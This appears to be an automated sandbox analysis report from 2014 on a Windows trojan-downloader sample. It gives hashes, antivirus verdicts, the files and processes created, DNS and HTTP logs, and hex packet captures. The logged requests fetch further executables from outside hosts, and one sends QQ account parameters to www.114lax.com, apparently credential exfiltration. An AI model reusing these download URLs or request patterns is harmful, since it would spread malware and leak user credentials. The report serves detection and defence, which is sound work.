Analysis Date2014-07-04 20:33:37
MD59ebf98564050a779bb66249b40c005e3
SHA16f47b149bca16676f5c66f34d771d279284fd6f8

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 93fc79352eb6799e9ab947dbe246827b sha1: 502d8d079a983bdd919fee3e237a06707d9382a4 size: 217088
Section.rdata md5: 4150f628f92482c5cc41763829bb04f0 sha1: 3c712f98177f7538d2a1372f319a6f86297442ad size: 24576
Section.data md5: 8f973fc9b09c4c04f1fbe79aed81fa26 sha1: 2817e1dd7b0e3ba2528a0b54616ca229204ed9eb size: 126976
Timestamp2014-06-14 01:14:32
PackerMicrosoft Visual C++ v6.0
PEhashf2dc2c742c24b933b514ff8221e40a90f2f906b1
IMPhash534fda370ef08cf84397228cb8db97a1
AV360 SafeTrojan.GenericKD.1722119
AVAd-AwareTrojan.GenericKD.1722119
AVAlwil (avast)no_virus
AVArcabit (arcavir)no_virus
AVAuthentiumno_virus
AVAvira (antivir)no_virus
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)no_virus
AVClamAVno_virus
AVDr. WebTrojan.StartPage1.677
AVEmsisoftno_virus
AVEset (nod32)Win32/Agent.WAQ
AVFortinetno_virus
AVFrisk (f-prot)no_virus
AVF-SecureTrojan.GenericKD.1722119
AVGrisoft (avg)no_virus
AVIkarusTrojan-Downloader.Win32.Genome
AVK7Trojan ( 0049ba3a1 )
AVKasperskyTrojan-Downloader.Win32.Genome.hqhq
AVMalwareBytesno_virus
AVMcafeeno_virus
AVMicrosoft Security Essentialsno_virus
AVMicroWorld (escan)no_virus
AVNormanno_virus
AVRisingno_virus
AVSophosno_virus
AVSymantecno_virus
AVTrend Microno_virus
AVVirusBlokAda (vba32)no_virus
AVCA (E-Trust Ino)no_virus
AVKasperskyTrojan-Downloader.Win32.Genome.hqhq
AVF-SecureTrojan.GenericKD.1722119
AVDr. WebTrojan.StartPage1.677
AVK7Trojan ( 0049ba3a1 )
AVClamAVno_virus
AVFortinetno_virus
AVArcabit (arcavir)no_virus
AVSymantecno_virus
AVGrisoft (avg)no_virus
AVCAT (quickheal)no_virus
AVVirusBlokAda (vba32)no_virus
AVEset (nod32)Win32/Agent.WAQ
AVAlwil (avast)no_virus
AV360 SafeTrojan.GenericKD.1722119
AVTrend Microno_virus
AVAd-AwareTrojan.GenericKD.1722119
AVAuthentiumno_virus
AVEmsisoftno_virus
AVFrisk (f-prot)no_virus
AVIkarusTrojan-Downloader.Win32.Genome
AVNormanno_virus
AVAvira (antivir)no_virus
AVMalwareBytesno_virus
AVMicroWorld (escan)no_virus
AVMcafeeno_virus
AVRisingno_virus
AVMicrosoft Security Essentialsno_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\WINDOWS\system\pczh.txt
Creates File\Device\Afd\Endpoint
Creates FileC:\WINDOWS\system\dudu.txt
Creates File\Device\Afd\AsyncConnectHlp
Creates ProcessC:\Program Files\pczh_108_824.exe
Winsock URLhttp://www.114lax.com/xin3/mail.asp?qqnumber= dianxinzhen&qqpassword= 6
Winsock URLhttp://jifendownload.2345.cn/jifen_2345/p3_kbaidu888888_jg04OunlF483lZatm7PJZ_v14.5.2.exe

Process
↳ C:\Program Files\pczh_108_824.exe

Network Details:

DNSkanboxshare.com
Type: A
42.120.153.16
DNSdownload.2345.com
Type: A
61.147.127.203
DNSdownload.2345.com
Type: A
61.160.245.8
DNSdownload.2345.com
Type: A
61.160.245.11
DNSdownload.2345.com
Type: A
61.160.245.14
DNSdownload.2345.com
Type: A
122.228.248.3
DNSdownload.2345.com
Type: A
218.75.155.244
DNSdownload.2345.com
Type: A
60.191.187.15
DNSdownload.2345.com
Type: A
60.191.223.2
DNSdownload.2345.com
Type: A
60.191.223.4
DNSdownload.2345.com
Type: A
60.191.223.15
DNSdownload.2345.com
Type: A
61.147.127.202
DNScc00011.h.cnc.ccgslb.com.cn
Type: A
182.118.77.89
DNScc00011.h.cnc.ccgslb.com.cn
Type: A
182.118.77.103
DNScc00011.h.cnc.ccgslb.com.cn
Type: A
218.8.51.36
DNScc00011.h.cnc.ccgslb.com.cn
Type: A
218.8.51.40
DNScc00011.h.cnc.ccgslb.com.cn
Type: A
61.240.135.23
DNScc00011.h.cnc.ccgslb.com.cn
Type: A
116.114.22.7
DNScc00011.h.cnc.ccgslb.com.cn
Type: A
119.188.139.83
DNScc00011.h.cnc.ccgslb.com.cn
Type: A
122.143.24.36
DNScc00011.h.cnc.ccgslb.com.cn
Type: A
123.235.32.65
DNScc00011.h.cnc.ccgslb.com.cn
Type: A
124.95.150.216
DNSdx5.3525.com
Type: A
222.186.130.92
DNSwww.114lax.com
Type: A
175.41.30.156
DNSjifendownload.2345.cn
Type: A
DNSdown.shuyeer.net
Type: A
DNSxz.fuzhicheng.com
Type: A
HTTP POSThttp://kanboxshare.com/interface/publiclink.php
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
HTTP POSThttp://kanboxshare.com/interface/publiclink.php
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
HTTP POSThttp://kanboxshare.com/interface/publiclink.php
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
HTTP POSThttp://kanboxshare.com/interface/publiclink.php
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
HTTP POSThttp://kanboxshare.com/interface/publiclink.php
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
HTTP GEThttp://jifendownload.2345.cn/jifen_2345/p3_kbaidu888888_jg04OunlF483lZatm7PJZ_v14.5.2.exe
User-Agent: DownJet1.0
HTTP GEThttp://jifendownload.2345.cn/jifen_2345/p3_kbaidu888888_jg04OunlF483lZatm7PJZ_v14.5.2.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://down.shuyeer.net/dudu/dudu_b_55313.exe
User-Agent: DownJet1.0
HTTP GEThttp://xz.fuzhicheng.com/new/pczh_108_824.exe
User-Agent: DownJet1.0
HTTP GEThttp://www.114lax.com/xin3/mail.asp?qqnumber=%20dianxinzhen&qqpassword=%20%206
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Flows TCP192.168.1.1:1031 ➝ 42.120.153.16:80
Flows TCP192.168.1.1:1032 ➝ 42.120.153.16:80
Flows TCP192.168.1.1:1033 ➝ 42.120.153.16:80
Flows TCP192.168.1.1:1034 ➝ 42.120.153.16:80
Flows TCP192.168.1.1:1035 ➝ 42.120.153.16:80
Flows TCP192.168.1.1:1036 ➝ 61.147.127.203:80
Flows TCP192.168.1.1:1038 ➝ 61.147.127.203:80
Flows TCP192.168.1.1:1039 ➝ 182.118.77.89:80
Flows TCP192.168.1.1:1040 ➝ 222.186.130.92:80
Flows TCP192.168.1.1:1041 ➝ 175.41.30.156:80

Raw Pcap
0x00000000 (00000)   504f5354 202f696e 74657266 6163652f   POST /interface/
0x00000010 (00016)   7075626c 69636c69 6e6b2e70 68702048   publiclink.php H
0x00000020 (00032)   5454502f 312e310d 0a526566 65726572   TTP/1.1..Referer
0x00000030 (00048)   3a206874 74703a2f 2f6b616e 626f7873   : http://kanboxs
0x00000040 (00064)   68617265 2e636f6d 2f696e74 65726661   hare.com/interfa
0x00000050 (00080)   63652f70 75626c69 636c696e 6b2e7068   ce/publiclink.ph
0x00000060 (00096)   700d0a41 63636570 743a202a 2f2a0d0a   p..Accept: */*..
0x00000070 (00112)   41636365 70742d4c 616e6775 6167653a   Accept-Language:
0x00000080 (00128)   207a682d 636e0d0a 436f6e74 656e742d    zh-cn..Content-
0x00000090 (00144)   54797065 3a206170 706c6963 6174696f   Type: applicatio
0x000000a0 (00160)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x000000b0 (00176)   656e636f 6465640d 0a557365 722d4167   encoded..User-Ag
0x000000c0 (00192)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x000000d0 (00208)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x000000e0 (00224)   49452039 2e303b20 57696e64 6f777320   IE 9.0; Windows 
0x000000f0 (00240)   4e542036 2e313b20 3132354c 413b202e   NT 6.1; 125LA; .
0x00000100 (00256)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x00000110 (00272)   373b202e 4e455420 434c5220 332e302e   7; .NET CLR 3.0.
0x00000120 (00288)   30343530 362e3634 383b202e 4e455420   04506.648; .NET 
0x00000130 (00304)   434c5220 332e352e 32313032 32290d0a   CLR 3.5.21022)..
0x00000140 (00320)   486f7374 3a206b61 6e626f78 73686172   Host: kanboxshar
0x00000150 (00336)   652e636f 6d0d0a43 6f6e7465 6e742d4c   e.com..Content-L
0x00000160 (00352)   656e6774 683a2038 310d0a43 61636865   ength: 81..Cache
0x00000170 (00368)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x00000180 (00384)   68650d0a 0d0a6163 743d6765 74696e66   he....act=getinf
0x00000190 (00400)   6f266b65 793d3249 33446659 6b513235   o&key=2I3DfYkQ25
0x000001a0 (00416)   734a7753 3076426a 36366364 36513943   sJwS0vBj66cd6Q9C
0x000001b0 (00432)   4344494a 58756549 796c6678 45543767   CDIJXueIylfxET7g
0x000001c0 (00448)   48316365 63696455 4a594271 4a62354e   H1cecidUJYBqJb5N
0x000001d0 (00464)   476c694a 4b7663                       GliJKvc

0x00000000 (00000)   504f5354 202f696e 74657266 6163652f   POST /interface/
0x00000010 (00016)   7075626c 69636c69 6e6b2e70 68702048   publiclink.php H
0x00000020 (00032)   5454502f 312e310d 0a526566 65726572   TTP/1.1..Referer
0x00000030 (00048)   3a206874 74703a2f 2f6b616e 626f7873   : http://kanboxs
0x00000040 (00064)   68617265 2e636f6d 2f696e74 65726661   hare.com/interfa
0x00000050 (00080)   63652f70 75626c69 636c696e 6b2e7068   ce/publiclink.ph
0x00000060 (00096)   700d0a41 63636570 743a202a 2f2a0d0a   p..Accept: */*..
0x00000070 (00112)   41636365 70742d4c 616e6775 6167653a   Accept-Language:
0x00000080 (00128)   207a682d 636e0d0a 436f6e74 656e742d    zh-cn..Content-
0x00000090 (00144)   54797065 3a206170 706c6963 6174696f   Type: applicatio
0x000000a0 (00160)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x000000b0 (00176)   656e636f 6465640d 0a557365 722d4167   encoded..User-Ag
0x000000c0 (00192)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x000000d0 (00208)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x000000e0 (00224)   49452039 2e303b20 57696e64 6f777320   IE 9.0; Windows 
0x000000f0 (00240)   4e542036 2e313b20 3132354c 413b202e   NT 6.1; 125LA; .
0x00000100 (00256)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x00000110 (00272)   373b202e 4e455420 434c5220 332e302e   7; .NET CLR 3.0.
0x00000120 (00288)   30343530 362e3634 383b202e 4e455420   04506.648; .NET 
0x00000130 (00304)   434c5220 332e352e 32313032 32290d0a   CLR 3.5.21022)..
0x00000140 (00320)   486f7374 3a206b61 6e626f78 73686172   Host: kanboxshar
0x00000150 (00336)   652e636f 6d0d0a43 6f6e7465 6e742d4c   e.com..Content-L
0x00000160 (00352)   656e6774 683a2038 310d0a43 61636865   ength: 81..Cache
0x00000170 (00368)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x00000180 (00384)   68650d0a 0d0a6163 743d6765 74696e66   he....act=getinf
0x00000190 (00400)   6f266b65 793d5766 415a6275 4a525650   o&key=WfAZbuJRVP
0x000001a0 (00416)   41444955 73745455 45725265 46364159   ADIUstTUErReF6AY
0x000001b0 (00432)   41586d4d 6c594166 77596231 6a555058   AXmMlYAfwYb1jUPX
0x000001c0 (00448)   35533849 37513957 41757832 4266354b   5S8I7Q9WAux2Bf5K
0x000001d0 (00464)   4e576d66 6a4d38                       NWmfjM8

0x00000000 (00000)   504f5354 202f696e 74657266 6163652f   POST /interface/
0x00000010 (00016)   7075626c 69636c69 6e6b2e70 68702048   publiclink.php H
0x00000020 (00032)   5454502f 312e310d 0a526566 65726572   TTP/1.1..Referer
0x00000030 (00048)   3a206874 74703a2f 2f6b616e 626f7873   : http://kanboxs
0x00000040 (00064)   68617265 2e636f6d 2f696e74 65726661   hare.com/interfa
0x00000050 (00080)   63652f70 75626c69 636c696e 6b2e7068   ce/publiclink.ph
0x00000060 (00096)   700d0a41 63636570 743a202a 2f2a0d0a   p..Accept: */*..
0x00000070 (00112)   41636365 70742d4c 616e6775 6167653a   Accept-Language:
0x00000080 (00128)   207a682d 636e0d0a 436f6e74 656e742d    zh-cn..Content-
0x00000090 (00144)   54797065 3a206170 706c6963 6174696f   Type: applicatio
0x000000a0 (00160)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x000000b0 (00176)   656e636f 6465640d 0a557365 722d4167   encoded..User-Ag
0x000000c0 (00192)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x000000d0 (00208)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x000000e0 (00224)   49452039 2e303b20 57696e64 6f777320   IE 9.0; Windows 
0x000000f0 (00240)   4e542036 2e313b20 3132354c 413b202e   NT 6.1; 125LA; .
0x00000100 (00256)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x00000110 (00272)   373b202e 4e455420 434c5220 332e302e   7; .NET CLR 3.0.
0x00000120 (00288)   30343530 362e3634 383b202e 4e455420   04506.648; .NET 
0x00000130 (00304)   434c5220 332e352e 32313032 32290d0a   CLR 3.5.21022)..
0x00000140 (00320)   486f7374 3a206b61 6e626f78 73686172   Host: kanboxshar
0x00000150 (00336)   652e636f 6d0d0a43 6f6e7465 6e742d4c   e.com..Content-L
0x00000160 (00352)   656e6774 683a2038 350d0a43 61636865   ength: 85..Cache
0x00000170 (00368)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x00000180 (00384)   68650d0a 0d0a6163 743d6765 74696e66   he....act=getinf
0x00000190 (00400)   6f266b65 793d755a 6f314249 63736c48   o&key=uZo1BIcslH
0x000001a0 (00416)   66517939 4145474e 6b695535 4a6a3270   fQy9AEGNkiU5Jj2p
0x000001b0 (00432)   584e7356 6c315364 62485659 44327764   XNsVl1SdbHVYD2wd
0x000001c0 (00448)   41686144 6f715255 68504173 3665735a   AhaDoqRUhPAs6esZ
0x000001d0 (00464)   564e6444 7254764a 657977              VNdDrTvJeyw

0x00000000 (00000)   504f5354 202f696e 74657266 6163652f   POST /interface/
0x00000010 (00016)   7075626c 69636c69 6e6b2e70 68702048   publiclink.php H
0x00000020 (00032)   5454502f 312e310d 0a526566 65726572   TTP/1.1..Referer
0x00000030 (00048)   3a206874 74703a2f 2f6b616e 626f7873   : http://kanboxs
0x00000040 (00064)   68617265 2e636f6d 2f696e74 65726661   hare.com/interfa
0x00000050 (00080)   63652f70 75626c69 636c696e 6b2e7068   ce/publiclink.ph
0x00000060 (00096)   700d0a41 63636570 743a202a 2f2a0d0a   p..Accept: */*..
0x00000070 (00112)   41636365 70742d4c 616e6775 6167653a   Accept-Language:
0x00000080 (00128)   207a682d 636e0d0a 436f6e74 656e742d    zh-cn..Content-
0x00000090 (00144)   54797065 3a206170 706c6963 6174696f   Type: applicatio
0x000000a0 (00160)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x000000b0 (00176)   656e636f 6465640d 0a557365 722d4167   encoded..User-Ag
0x000000c0 (00192)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x000000d0 (00208)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x000000e0 (00224)   49452039 2e303b20 57696e64 6f777320   IE 9.0; Windows 
0x000000f0 (00240)   4e542036 2e313b20 3132354c 413b202e   NT 6.1; 125LA; .
0x00000100 (00256)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x00000110 (00272)   373b202e 4e455420 434c5220 332e302e   7; .NET CLR 3.0.
0x00000120 (00288)   30343530 362e3634 383b202e 4e455420   04506.648; .NET 
0x00000130 (00304)   434c5220 332e352e 32313032 32290d0a   CLR 3.5.21022)..
0x00000140 (00320)   486f7374 3a206b61 6e626f78 73686172   Host: kanboxshar
0x00000150 (00336)   652e636f 6d0d0a43 6f6e7465 6e742d4c   e.com..Content-L
0x00000160 (00352)   656e6774 683a2038 310d0a43 61636865   ength: 81..Cache
0x00000170 (00368)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x00000180 (00384)   68650d0a 0d0a6163 743d6765 74696e66   he....act=getinf
0x00000190 (00400)   6f266b65 793d576c 784c3334 4138587a   o&key=WlxL34A8Xz
0x000001a0 (00416)   79316a6e 564d6a71 6b4b555a 526b4448   y1jnVMjqkKUZRkDH
0x000001b0 (00432)   68594573 6b444c4f 53486944 444d6747   hYEskDLOSHiDDMgG
0x000001c0 (00448)   50754573 34634935 766d6f61 69387076   PuEs4cI5vmoai8pv
0x000001d0 (00464)   684c454e 3647734a 657977              hLEN6GsJeyw

0x00000000 (00000)   504f5354 202f696e 74657266 6163652f   POST /interface/
0x00000010 (00016)   7075626c 69636c69 6e6b2e70 68702048   publiclink.php H
0x00000020 (00032)   5454502f 312e310d 0a526566 65726572   TTP/1.1..Referer
0x00000030 (00048)   3a206874 74703a2f 2f6b616e 626f7873   : http://kanboxs
0x00000040 (00064)   68617265 2e636f6d 2f696e74 65726661   hare.com/interfa
0x00000050 (00080)   63652f70 75626c69 636c696e 6b2e7068   ce/publiclink.ph
0x00000060 (00096)   700d0a41 63636570 743a202a 2f2a0d0a   p..Accept: */*..
0x00000070 (00112)   41636365 70742d4c 616e6775 6167653a   Accept-Language:
0x00000080 (00128)   207a682d 636e0d0a 436f6e74 656e742d    zh-cn..Content-
0x00000090 (00144)   54797065 3a206170 706c6963 6174696f   Type: applicatio
0x000000a0 (00160)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x000000b0 (00176)   656e636f 6465640d 0a557365 722d4167   encoded..User-Ag
0x000000c0 (00192)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x000000d0 (00208)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x000000e0 (00224)   49452039 2e303b20 57696e64 6f777320   IE 9.0; Windows 
0x000000f0 (00240)   4e542036 2e313b20 3132354c 413b202e   NT 6.1; 125LA; .
0x00000100 (00256)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x00000110 (00272)   373b202e 4e455420 434c5220 332e302e   7; .NET CLR 3.0.
0x00000120 (00288)   30343530 362e3634 383b202e 4e455420   04506.648; .NET 
0x00000130 (00304)   434c5220 332e352e 32313032 32290d0a   CLR 3.5.21022)..
0x00000140 (00320)   486f7374 3a206b61 6e626f78 73686172   Host: kanboxshar
0x00000150 (00336)   652e636f 6d0d0a43 6f6e7465 6e742d4c   e.com..Content-L
0x00000160 (00352)   656e6774 683a2036 310d0a43 61636865   ength: 61..Cache
0x00000170 (00368)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x00000180 (00384)   68650d0a 0d0a6163 743d6765 74696e66   he....act=getinf
0x00000190 (00400)   6f266b65 793d5276 30797a68 3363746f   o&key=Rv0yzh3cto
0x000001a0 (00416)   64413645 69387744 37304237 75526f74   dA6Ei8wD70B7uRot
0x000001b0 (00432)   3536334d 534e5342 69445148 43345443   563MSNSBiDQHC4TC
0x000001c0 (00448)   536b3473 34634935 766d6f61 69387076   Sk4s4cI5vmoai8pv
0x000001d0 (00464)   684c454e 3647734a 657977              hLEN6GsJeyw

0x00000000 (00000)   47455420 2f6a6966 656e5f32 3334352f   GET /jifen_2345/
0x00000010 (00016)   70335f6b 62616964 75383838 3838385f   p3_kbaidu888888_
0x00000020 (00032)   6a673034 4f756e6c 46343833 6c5a6174   jg04OunlF483lZat
0x00000030 (00048)   6d37504a 5a5f7631 342e352e 322e6578   m7PJZ_v14.5.2.ex
0x00000040 (00064)   65204854 54502f31 2e310d0a 41636365   e HTTP/1.1..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a557365 722d4167   pt: */*..User-Ag
0x00000060 (00096)   656e743a 20446f77 6e4a6574 312e300d   ent: DownJet1.0.
0x00000070 (00112)   0a486f73 743a206a 6966656e 646f776e   .Host: jifendown
0x00000080 (00128)   6c6f6164 2e323334 352e636e 0d0a436f   load.2345.cn..Co
0x00000090 (00144)   6e6e6563 74696f6e 3a20436c 6f73650d   nnection: Close.
0x000000a0 (00160)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x000000b0 (00176)   6e6f2d63 61636865 0d0a0d0a 722d4167   no-cache....r-Ag
0x000000c0 (00192)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x000000d0 (00208)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x000000e0 (00224)   49452039 2e303b20 57696e64 6f777320   IE 9.0; Windows 
0x000000f0 (00240)   4e542036 2e313b20 3132354c 413b202e   NT 6.1; 125LA; .
0x00000100 (00256)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x00000110 (00272)   373b202e 4e455420 434c5220 332e302e   7; .NET CLR 3.0.
0x00000120 (00288)   30343530 362e3634 383b202e 4e455420   04506.648; .NET 
0x00000130 (00304)   434c5220 332e352e 32313032 32290d0a   CLR 3.5.21022)..
0x00000140 (00320)   486f7374 3a206b61 6e626f78 73686172   Host: kanboxshar
0x00000150 (00336)   652e636f 6d0d0a43 6f6e7465 6e742d4c   e.com..Content-L
0x00000160 (00352)   656e6774 683a2036 310d0a43 61636865   ength: 61..Cache
0x00000170 (00368)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x00000180 (00384)   68650d0a 0d0a6163 743d6765 74696e66   he....act=getinf
0x00000190 (00400)   6f266b65 793d5276 30797a68 3363746f   o&key=Rv0yzh3cto
0x000001a0 (00416)   64413645 69387744 37304237 75526f74   dA6Ei8wD70B7uRot
0x000001b0 (00432)   3536334d 534e5342 69445148 43345443   563MSNSBiDQHC4TC
0x000001c0 (00448)   536b3473 34634935 766d6f61 69387076   Sk4s4cI5vmoai8pv
0x000001d0 (00464)   684c454e 3647734a 657977              hLEN6GsJeyw

0x00000000 (00000)   47455420 2f6a6966 656e5f32 3334352f   GET /jifen_2345/
0x00000010 (00016)   70335f6b 62616964 75383838 3838385f   p3_kbaidu888888_
0x00000020 (00032)   6a673034 4f756e6c 46343833 6c5a6174   jg04OunlF483lZat
0x00000030 (00048)   6d37504a 5a5f7631 342e352e 322e6578   m7PJZ_v14.5.2.ex
0x00000040 (00064)   65204854 54502f31 2e310d0a 41636365   e HTTP/1.1..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a416363 6570742d   pt: */*..Accept-
0x00000060 (00096)   456e636f 64696e67 3a20677a 69702c20   Encoding: gzip, 
0x00000070 (00112)   6465666c 6174650d 0a557365 722d4167   deflate..User-Ag
0x00000080 (00128)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000090 (00144)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x000000a0 (00160)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x000000b0 (00176)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x000000c0 (00192)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x000000d0 (00208)   0d0a486f 73743a20 6a696665 6e646f77   ..Host: jifendow
0x000000e0 (00224)   6e6c6f61 642e3233 34352e63 6e0d0a43   nload.2345.cn..C
0x000000f0 (00240)   6f6e6e65 6374696f 6e3a204b 6565702d   onnection: Keep-
0x00000100 (00256)   416c6976 650d0a0d 0a2e302e 35303732   Alive.....0.5072
0x00000110 (00272)   373b202e 4e455420 434c5220 332e302e   7; .NET CLR 3.0.
0x00000120 (00288)   30343530 362e3634 383b202e 4e455420   04506.648; .NET 
0x00000130 (00304)   434c5220 332e352e 32313032 32290d0a   CLR 3.5.21022)..
0x00000140 (00320)   486f7374 3a206b61 6e626f78 73686172   Host: kanboxshar
0x00000150 (00336)   652e636f 6d0d0a43 6f6e7465 6e742d4c   e.com..Content-L
0x00000160 (00352)   656e6774 683a2036 310d0a43 61636865   ength: 61..Cache
0x00000170 (00368)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x00000180 (00384)   68650d0a 0d0a6163 743d6765 74696e66   he....act=getinf
0x00000190 (00400)   6f266b65 793d5276 30797a68 3363746f   o&key=Rv0yzh3cto
0x000001a0 (00416)   64413645 69387744 37304237 75526f74   dA6Ei8wD70B7uRot
0x000001b0 (00432)   3536334d 534e5342 69445148 43345443   563MSNSBiDQHC4TC
0x000001c0 (00448)   536b3473 34634935 766d6f61 69387076   Sk4s4cI5vmoai8pv
0x000001d0 (00464)   684c454e 3647734a 657977              hLEN6GsJeyw

0x00000000 (00000)   47455420 2f647564 752f6475 64755f62   GET /dudu/dudu_b
0x00000010 (00016)   5f353533 31332e65 78652048 5454502f   _55313.exe HTTP/
0x00000020 (00032)   312e310d 0a416363 6570743a 202a2f2a   1.1..Accept: */*
0x00000030 (00048)   0d0a5573 65722d41 67656e74 3a20446f   ..User-Agent: Do
0x00000040 (00064)   776e4a65 74312e30 0d0a486f 73743a20   wnJet1.0..Host: 
0x00000050 (00080)   646f776e 2e736875 79656572 2e6e6574   down.shuyeer.net
0x00000060 (00096)   0d0a436f 6e6e6563 74696f6e 3a20436c   ..Connection: Cl
0x00000070 (00112)   6f73650d 0a436163 68652d43 6f6e7472   ose..Cache-Contr
0x00000080 (00128)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x00000090 (00144)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x000000a0 (00160)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x000000b0 (00176)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x000000c0 (00192)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x000000d0 (00208)   0d0a486f 73743a20 6a696665 6e646f77   ..Host: jifendow
0x000000e0 (00224)   6e6c6f61 642e3233 34352e63 6e0d0a43   nload.2345.cn..C
0x000000f0 (00240)   6f6e6e65 6374696f 6e3a204b 6565702d   onnection: Keep-
0x00000100 (00256)   416c6976 650d0a0d 0a2e302e 35303732   Alive.....0.5072
0x00000110 (00272)   373b202e 4e455420 434c5220 332e302e   7; .NET CLR 3.0.
0x00000120 (00288)   30343530 362e3634 383b202e 4e455420   04506.648; .NET 
0x00000130 (00304)   434c5220 332e352e 32313032 32290d0a   CLR 3.5.21022)..
0x00000140 (00320)   486f7374 3a206b61 6e626f78 73686172   Host: kanboxshar
0x00000150 (00336)   652e636f 6d0d0a43 6f6e7465 6e742d4c   e.com..Content-L
0x00000160 (00352)   656e6774 683a2036 310d0a43 61636865   ength: 61..Cache
0x00000170 (00368)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x00000180 (00384)   68650d0a 0d0a6163 743d6765 74696e66   he....act=getinf
0x00000190 (00400)   6f266b65 793d5276 30797a68 3363746f   o&key=Rv0yzh3cto
0x000001a0 (00416)   64413645 69387744 37304237 75526f74   dA6Ei8wD70B7uRot
0x000001b0 (00432)   3536334d 534e5342 69445148 43345443   563MSNSBiDQHC4TC
0x000001c0 (00448)   536b3473 34634935 766d6f61 69387076   Sk4s4cI5vmoai8pv
0x000001d0 (00464)   684c454e 3647734a 657977              hLEN6GsJeyw

0x00000000 (00000)   47455420 2f6e6577 2f70637a 685f3130   GET /new/pczh_10
0x00000010 (00016)   385f3832 342e6578 65204854 54502f31   8_824.exe HTTP/1
0x00000020 (00032)   2e310d0a 41636365 70743a20 2a2f2a0d   .1..Accept: */*.
0x00000030 (00048)   0a557365 722d4167 656e743a 20446f77   .User-Agent: Dow
0x00000040 (00064)   6e4a6574 312e300d 0a486f73 743a2078   nJet1.0..Host: x
0x00000050 (00080)   7a2e6675 7a686963 68656e67 2e636f6d   z.fuzhicheng.com
0x00000060 (00096)   0d0a436f 6e6e6563 74696f6e 3a20436c   ..Connection: Cl
0x00000070 (00112)   6f73650d 0a436163 68652d43 6f6e7472   ose..Cache-Contr
0x00000080 (00128)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x00000090 (00144)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x000000a0 (00160)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x000000b0 (00176)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x000000c0 (00192)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x000000d0 (00208)   0d0a486f 73743a20 6a696665 6e646f77   ..Host: jifendow
0x000000e0 (00224)   6e6c6f61 642e3233 34352e63 6e0d0a43   nload.2345.cn..C
0x000000f0 (00240)   6f6e6e65 6374696f 6e3a204b 6565702d   onnection: Keep-
